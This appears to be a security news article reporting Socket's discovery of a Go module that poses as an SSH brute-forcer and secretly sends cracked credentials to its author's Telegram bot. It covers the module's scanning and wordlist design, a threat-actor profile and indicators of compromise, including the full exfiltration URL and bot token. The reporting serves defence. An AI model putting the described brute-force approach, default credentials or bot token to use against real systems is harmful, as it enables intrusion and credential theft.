Socket’s Threat Research Team has uncovered a deceptive Go module named golang-random-ip-ssh-bruteforce, which masquerades as an efficient SSH brute-forcing tool but secretly exfiltrates stolen credentials to its creator.
Published on June 24, 2022, this package remains active on the Go Module ecosystem and GitHub, despite efforts to petition for its removal and the suspension of the associated accounts.
The module operates by generating random IPv4 addresses, probing for open TCP port 22 with a brief timeout, and launching concurrent authentication attempts using a hardcoded local wordlist of weak username-password pairs.
Discovery of Malicious Package
Upon the first successful login, it transmits the target IP, username, and password to a predefined Telegram bot via an HTTPS request, effectively handing over any initial access to the threat actor.
This design leverages unwitting users to perform distributed scanning and guessing, offloading the computational and legal risks while funneling successes to a single point of control.
The code employs ssh.InsecureIgnoreHostKey() to bypass server identity verification, enabling rapid connections without security checks, and exits after exfiltration to minimize detection.
The embedded wordlist focuses on common defaults like “root” and “admin” paired with entries such as “toor,” “raspberry,” “dietpi,” and “alpine,” targeting exposed IoT devices, single-board computers, and poorly configured Linux hosts.
This approach ensures low noise, offline operation until a hit, and plausible deniability as a legitimate offensive security tool.
Threat Actor Profile
The perpetrator, operating under the GitHub alias IllDieAnyway (also known as G3TT), is assessed with high confidence as a Russian-speaking individual based on Russian-language artifacts in repositories, including full READMEs and VKontakte-specific tooling like vk_inviter.
Their portfolio includes other offensive utilities such as port scanners, a phpMyAdmin brute-forcer with Telegram callbacks, and the Selica-C2 framework, suggesting potential for building botnets from harvested SSH accesses.
While no direct code linkage exists between this module and Selica-C2, the tools could synergize for post-exploitation activities like payload deployment or ransomware staging.
Running this package exposes operators to significant risks, including legal violations from unauthorized scanning, ISP blacklisting, and the irony of surrendering their discoveries to the actor via the active Telegram bot @sshZXC_bot, which delivers data to chat ID 1159678884 controlled by user @io_ping.
In the criminal underground, such credentials are valuable for espionage, cryptomining, or pivoting into networks, amplifying the module’s impact beyond individual runs.
To mitigate, organizations should enforce code reviews for third-party tools, monitor egress traffic to messaging APIs, and deploy detections for patterns like Telegram endpoints and insecure SSH configurations.
According to the report, Socket’s AI-driven tools, including its GitHub App and CLI, provide proactive defenses by scanning for risky behaviors in dependencies.
This incident highlights an emerging trend of weaponized open-source utilities that exploit trust in supply chains, urging developers to verify packages thoroughly and adopt layered security controls to prevent inadvertent participation in malicious campaigns.
Indicators of Compromise (IOCs)
| Category | Details |
|---|---|
| Malicious Go Package | golang-random-ip-ssh-bruteforce |
| Threat Actor’s Alias and GitHub | IllDieAnyway |
| Exfiltration Endpoint | https://api.telegram.org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text= |
| Telegram Identifiers | Bot token: 5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY Bot name and handle: ssh_bot (@sshZXC_bot) Destination chat_id: 1159678884 Destination user: Gett (@io_ping) |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
